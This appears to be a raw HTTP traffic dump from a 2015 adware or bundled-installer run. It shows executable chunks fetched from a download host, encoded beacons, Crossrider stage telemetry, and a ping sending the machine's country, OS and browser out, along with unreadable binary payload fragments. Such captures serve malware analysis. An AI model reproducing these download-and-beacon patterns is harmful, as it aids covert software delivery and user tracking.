...A.QR.R$....Vij...).....EO.G].->..zuIN.....?2............d....E..
p...pp.g......k |..[..r..c .t.=...........is.;t.R......._..B..Y..sQRS:
a!.c$.C.U.\e.E....2t=a....7.....~..~....e......!].R...m.&........3....
vn...$H.;....F.h..l:........<.'..5.j.....I.)G.....y..6./...V......C
.|q......|Tc.d..G1.CX~....&..ut..> ...~5.....L7...@.#....08.I..<<< skipped >>>

GET /2377.ashx?e=2fVCHF6kf8gQ0V45w4Sc0WByKcxzlv580m7i 9H0u1uAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPGAqkMremTu1UAw87IpRxOgd/XCztdoPbJFiFlIaXxqEcmxw368usKjvx7ENkzRxOw/caEgn1aywj5N0jWsNR8MoexnI9SC14XbVwDStlFVZXVJgYQsPAh56xK0PQZ59GgROorJaaO22Hr5Jh 0vvS2sI9d zRUY660rXCKv72ck3a4leJj3gd30GxQkL QSvRXZhP8niUnuouQlrWxrEbh307rxaZ1a5R0XN4kzLp8byxoV5yxM aWz/mAL2f0kUvlxFm3ANXIVukv6L3jUTEetkfkXeiixz7VYzHpwFHNpOecXjUPxXOs63 4FUU7ahslKZixWyxYlhfMUt2wWrpAbmmceboMbQKhEXfc6iwiXOu Yv65 F7gLnsSLFHSKl92oOSCaAzXhNzKEv37udDSmkfVorzgpqzFQi2pphZpM0eXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:07 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Sat, 01 Aug 2015 04:17:07 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /utility.gif?report=fdata&f=3&c=1729&i=30&n=ms_download_success&rnd=17999 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:42 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /27944.ashx?e=uWabAt9SLcwLjT49fHfOTNDx0QK0tujFjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF8PMHri1e7C9NPJ5v96kxwbVWTFo Vb8YXwF8xC533FcDPI5dGTWg7/48CMVjnZqYc8xmpxiLTPoz9GdXwkjcG2M0isR26F8c7K4ihqKSxe0jgb6v7cXpPt vCrCw4vHoxi6nXHFmzl4UJIhz0JUpzEfEpjPND7Tv589gkZhC35q9md5CSrcUCSh4vJSfGWeuF gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfDzB64tXuwvTTyeb/epMcG1VkxaPlW/GE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=1ZEnpGuz/IQqQvvNc0/QxKGNjjUHyQp W1tgKrNy38lA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTQ6SaxLQh/qwXCfGg4gcTppNB3Tmp8 xhs IILilpWF0OiEhuPxDpVo0KXYjr4isejZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVei4GUPP3zmQok4Z/T4OvkuHPbyEzOU1sA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Sat, 01 Aug 2015 04:17:42 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /utility.gif?report=fdata&f=3&c=803&i=30&n=ms_download_success&rnd=17999 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:42 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?report=fdata&f=3&c=803&i=35&n=ms_about_to_exc&rnd=28949 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:42 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?error=mem_strt&report=mini_s&ver=1729&action=na&ms_vr=3&clock=5110&rnd=8361 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:43 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /spdbt/shoppy/snsch7.exe_e HTTP/1.1

Host: dl.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:39 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438276447"

Last-Modified: Thu, 30 Jul 2015 17:14:07 GMT

Cache-Control: max-age=1461

Content-Length: 2088396

Content-Type: text/plain

X-HW: 1438402659.dop006.fr7.t,1438402659.cds024.fr7.sr,1438402659.dop005.dc1.r,1438402659.cds023.dc1.c,1438402659.cds024.fr7.pr
..;...Y..........r...<..i. B..a...g._n.Un..cX......B..)...u..xm4...
..J.E......k...... .4...li}V..{}...AAe..?K....A.......'.#x3..A:. ..u.J
.oc2P.....-B..X..~.......Q..6Q*..6....Tj|..xp.[p?T....,......#.))..N..
.......b{...V.%uNi...].. ....K....$|.a.....Q...E'.q>*..5....2w..6Ab
.{....6....tic....xO.o.La....RK.M.%.8i..!....3.0P.p.....`/..z...[mJ\.H
.:.........FZd..|.g.^.4..p..U...$*.6d....x..b.R..rr..Q.4........d...{&
lt;....!H....!..*=....}p.9.......0..J...X/Yj8...X...\....Yvm.~.....)R.
e.t..'v~.=@q..,.<... ]:w..G<.f..;.-8....U$..R.'.<....7..].0Z4
X..8............d..9.3k.Z......\..ms.....kj.K....`.D...iS47....ec;.*F)
...,i.v..h..7......i.....;..w.g...|V.p.:/.v.........Hpp.?/...K.'?.7.&g
t;.?.po.t.&.........f....a...W.....j]=.|u^.`...w}~..y..,..\.xWZ.}V.J/.
..........;.......,=.....J.."q..Z.&"\.g"...n.w...3....I.......].njN...
^}......k..6.]Q...T..D.....G.j...._.t.....=....W.a.W.........YG\MZ...n
y]-...c........H..... ..".2...........US.D...#..%..EJ. .f..F[ ........
.mY....y.k..rO .....F..i.....$....=.m...Za..a.....GE..O&{].%.UC.S.....
C.O.......P.......$..>....|.q.A..q...pC.-........Cw..4.L..?.....UQ.
Lk.f=:..$On!I.I......o.x...1s.o...{..9}t...y8..A?...Z..c.8....x..YD..b
.N...F......2.P......=Uzl.G.8......-.Pg...0K.......i.v....rêuU.<O
....B..p?.xE.G....q.\G.w..z...l......97...........8d%.....r.ln.b...u..
...l...^.Ey.M....X`.E....`.3.jI.b.490..Y8l\.d. ..?.-.x"(X....j.t..%..T
.]..j.'VN.>...-.K.."N.T.......C..qH.&..1.........._......G.........
......O.../;..N......%3...._i.9.)~..7-.......6{...S..>.8...=Nv;<<< skipped >>>

GET /utility.gif?report=fdata&f=3&c=803&i=20&n=ms_start_download&rnd=916 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:39 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?error=done_mem_0&report=mini_s&ver=803&action=na&ms_vr=3&clock=22531&rnd=18667 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:18:00 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /spdbt/shoppy/snsch7.exe_c HTTP/1.1

Host: dl.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:39 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438276442"

Last-Modified: Thu, 30 Jul 2015 17:14:02 GMT

Cache-Control: max-age=2554

Content-Length: 2088396

Content-Type: text/plain

X-HW: 1438402659.dop012.fr7.t,1438402659.cds007.fr7.sr,1438402658.dop006.dc1.r,1438402659.cds025.dc1.c,1438402659.cds007.fr7.pr
.....>x.5.~..&....?X*.M|./..p..1..^...Yu......w....u.O.-.73}!5.X)&.
 ..)]..#GD....s.<.<z......\z.....|..'M.p..ez.......u..<....t.
..(.........'..9.>O3.>......p..f../Er".. .N~...B...E....:... ..~
..4.t.cD.|.\.%n..*6...we.X..s8......>zb..>....Wi7.5..&.........6
...ME.p...(......{..$dP.......S\,....,...JL=j.N.6..[._..."..N ...Khj..
.9 J.$...F.F.4C. [......E.`..Yg.a...l.]...X.PK.9.h........8..G.....W..
.Qs..y......%..kP...U..'H{0i.>...X/y6..\.O.....M....^[...b.........
......H.T.........N..9.Tb...m....j.NX.........%....;....N0?...p.oI...f
7h.43....X..h..kA...I...e..,.j^.].....g..?......,......d..Y....4..s.i.
u_..[[email protected].[..t ...aQ..%.v...h.q.NH....=%..&....~_.O
.J.........p}H...!.K.......\[email protected]).W.....H..C.[....
.!h...R.......z....E.........J.........[...e#.b..] .v.......?P= O.....
1.....*f.`VNVS..\..t.nj.ju.,(.N;K.:....%.%........qWF}..=.W\..~.I...,.
H..:'.-......?....q(.j.)i.;.._-.1E'...V..UG............>t.......\~.
.._5..... ..$sc]$....6A........a~...=D.A..5N..d..x}.."}...B.."..C.....
.mo..H........4.K4.<.T......0,6.\$5{.@....(4..z|G...vx...D..>..`
:.!.....<:.4....G7......R... ...H......O..~....0p.....WN....\..-#..
1LK.gwS...1...#"H.r...O..EOCs..<..c%P.a.. .....>..o...Y........P
....._P.*.1.....c....}[email protected]]...ZZ..=2C.rI.0.|.....w.0
?..R.b..I.)<L......L...0..;H...6.)(..-....Tu.c6J6.....<?.mf..O..
T....\L....gR.6A...........FI.....I..x..%`Q|[email protected]...<..!s
o....U.0...T7..l...W.4...Y...Ipg..0...Z..B..4' .a.g|okhv...z..MJ.,<<< skipped >>>

GET /app/ping.ashx?action=uidCreated&userid={A12A645F-7F13-46EC-98C0-57B180FEB515}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&v=1.0.8654.1177&url=&title=&pingtext=&protocol=&size=0&ref=&browser= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.ytdownloader.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 0

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 01 Aug 2015 04:18:10 GMT

....

GET /web/gf/all/setup.exe_a HTTP/1.1

Host: dl.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:39 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438313675"

Last-Modified: Fri, 31 Jul 2015 03:34:35 GMT

Cache-Control: max-age=461

Content-Length: 2113811

Content-Type: text/plain

X-HW: 1438402659.dop006.fr7.t,1438402659.cds014.fr7.c

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@...........................
......./........ ..............................p.......p...o..........
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]........... [email protected].
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..

<<< skipped >>>

GET /16779.ashx?e=lnyQOXBgnIVgcinMc5b fOZ2TvHobpl2gDEcVfgp pZ7HO4WybUyRwxxlwe2BTjxgKpDK3pk7tXSS26A4HrgseLt6BhzfOsD0FbaakihgO1P17LdzRwGrcSywkF18Bl8YJpucY5gZaSI0uO8YCaEeHDt BwvUvK2OgXCEuEQ35bsk4IDaVDumfJR9y36AE8VUGeTCBaEQyQbe1ZN3pnb6zFxU5LviUXKRAQGkVD7mhWSCPTBz14MxScKZA7dr10wk5dpEt5PL7oIA44xPc2qom7c1W87ggrF6pqgVuVy 5fSGC/Mdcm7G BVy60SFak6tdBGbMT LaxCJELGDzYIEpSUHtL8QyxMw7HQ6UOrRmFylapLWfWeiOW7pPhPxmIJtngDOyc8OrMEe0ZxYaO0Z4LoX04Ef5YGASU331c/hmepeLfZWAU/ElPUufE6DKY9IO4kHWBb6nL9K5zKpbLSx0xM JMmHOf/3UB03ZmLOoILqrHF8gCihnYL0wot9Xvv4NbB6ns3CLtRDh0wyVSH8C6m5ZQjWuuGCVpHDePMpxUsF scXI mWdCbM6EeiW ZX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8WY515bwKb4/A== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Sat, 01 Aug 2015 04:17:03 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /29451.ashx?e=QHucCbLl /YLjT49fHfOTNcxGaPWyPpOjvdcLv9L0ULeyzV7AofXlljJzRxQxlEZ1rD0MhBpqdxv2upuoN/OX9aoPZj94HyT6LOwEGQvh2zV2TxY7/sL 44G r 3F6T7U6q7EvjWjEUpXTEKkNwLoRunJOmEe2tAEhmPvvKOaBJnrd89FhtM2ZOzMpVjzF1DJ1ANLsSNCmXNcQlgX3M502CabnGOYGWke9dSH 2S3SkStAZytkA54Y0S1nWxf2ZUZB6PWEkv//ugKlGaFWGmKrPJ0DN QuCj69QxV3C0qdKM1YNJ72n7uZgdETUPvQcwTankT3jqoI2swAhmPgoCunql2mR Jit5KoEjale7vIkdwEEqSCVwe/XD m2Vx1YJfOER8y559W1zAMMqIil745kZsURn/cxRj0 9JT4bx2oSZGh8MbdFFu4wvto3IW74upP5ChEmpd9HHVSuTi6RR1XT8KlLqjsANNN69riqxp5Z6LbpmNmFGDM2//e6a6AB1jT1RV/Lug9w/ UOvq3TV Xppilwb9x1QlTW7EcYYqf7r2hVIG5LbdW/BKYnNEj4sapDP2xI5hXE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Sat, 01 Aug 2015 04:17:03 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /web/gf/all/setup.exe_c HTTP/1.1

Host: dl.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:39 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438313681"

Last-Modified: Fri, 31 Jul 2015 03:34:41 GMT

Cache-Control: max-age=488

Content-Length: 2113811

Content-Type: text/plain

X-HW: 1438402659.dop004.fr7.t,1438402659.cds022.fr7.c
g.j..t.ohys?..<.>.._.Q>.(..Iu....?!..H.........I.......IL5m..
...(.y.R.C...Q.I9.x../..\w...9..p...V.....D.c.._..o^f...c..n.....y..|"
...8jHQ...C.I/.uJ%5Y...'P/IMVo....a..0b....$.3.X..]....H@z&.o...1...?2
...8...1y,5r4Q.ef2.....6o..{k;W..1.%>..|..h6.F]....pJ]v..2^....b...
...........I-....U..'4..1..z...axJYs-...wk.H.........P... ......94kIU.
.......=....&.a..H...~.:.....\.C...i&..K&.:B5.......I Wt...b/.....D.Q"
BhV"..ab.0.&......~...0.)Q....'....QSVP....H..j.D;|[email protected]
........G....;./..&., ..%K.A.........`}:D`....?.c<d.>..5....!.!8
n..".GiC.BwX....sP.......#G..k4o...`/.!.......K..I.J%......E.w?< wT
0.k.1....:....l.C..Z..(E.... ?.(\l.fuSxva.c..GO~..%.6Q................
...X.IR...^.|......g.<...v.v8.y....Z.."Sxx..9B....Ry...[XS..r..nj.c
uS.....g...m8T..v.4-.KQ........$<.....uQ..3..`.. ..S..L>P...5ex.
....@a ...q.p.9\0.8..][email protected]#.MB.o*
.C.......>Y2....Cy....DX......].}Npi..B.....K.m.z|l.1h.H.I..1.v....
[email protected]..=...1.2..........i..X.d......wS.u.....dO..}utk.....'y{.y....
.y3.Oa.7n..x.Y;...e.W..}............4........'..o......9.......O.\.Y.N
...8...p..V...l..'?T.U...~..O..... .q.....C...V`2.T..p._....; F`.|.rEt
Z1v..w....F.q..D..w\..(*....i.......O......2.oP.-.% .x0..q...g......u.
..w....AZ.....0..)..j.H5....."\.gg......AmW.!..C.....AMj....../......|
..h&.p....%1....x.idy..0........!.......$......v".<..U.8*......Ki.Z
..x....%.VWJ..5......H.[[email protected].......`.| se...
~. ......?q...JV...x.4E...0.(..XR.sv.A.n....`.................N..M<<< skipped >>>

GET /monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402674&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402674 HTTP/1.1

Host: logs.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:52 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1438402673.dop007.fr7.t,1438402672.cds021.fr7.c

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Sat, 01 Aug 
2015 04:17:52 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Al
ive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 
Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 3
5..Content-Type: image/gif..X-HW: 1438402673.dop007.fr7.t,1438402672.c
ds021.fr7.c..GIF89a.............,...........D..;..

GET /utility.gif?report=fdata&f=3&c=1729&i=10&n=ms_started&rnd=14220 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:39 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /27944.ashx?e=s0jsdppK9OtnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLkUIHBGIcHxGIGRftF69MkkCN9h bV19V1Gg4F6dkBzXUfBgwh1qVrevysBL0IwHwhEolvsKoHiSTZUc6Aooj3S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcboqKFmkaACc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:00 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=s0jsdppK9OtnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLkUIHBGIcHxGIGRftF69MkkCN9h bV19V1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqn4U8uoq4rC8jC8FaAJlN651M0VcwJ5frh3qtelLT3faUxGFR6X233hgA9D6a NOqQqDB Pa/ WrFM5s3KGksryS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcboqKFmkaACc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:00 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=2v0SNuZrMFyRcITdAqjv5mByKcxzlv58TwZrOj6glduAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJZSXTHO//VDXPceMBfl/cy8CFIZ4bs6830kOkPP/ lcqmO6sjIL1AsI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1XouBlDz985kKJOGf0 Dr5Lhz28hMzlNbA= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:00 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=2v0SNuZrMFyRcITdAqjv5mByKcxzlv58TwZrOj6glduAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJZSXTHO//VDXN2I0qd4G3ExvDbcr2ZCWDFAL52sIXt4UoKtXISWiV4lHG3D5R3V5O0a/7yn1m/tGd3P3SqySAb8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:00 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1i6nyHpDS4bOY4G r 3F6T7vd0ZIK3zyHSv9W41Hn7OPSVNckomstbKncplbj8o7GcklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGVCQ/iYxoLxYRi59DA/1o2VnsTn5x9YJkyrBnDEBfh98= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1j2vh7hk0cgBBQC drCF7eFGvGaf/td2Ate b6qsnxJzJ8pV57JU0YPOPNuNctLNP94FMchecJC7sTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1ip5hhmFUu/wdCUHeR8YCF35glrEy57w/m07ReD/zc3 EeXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

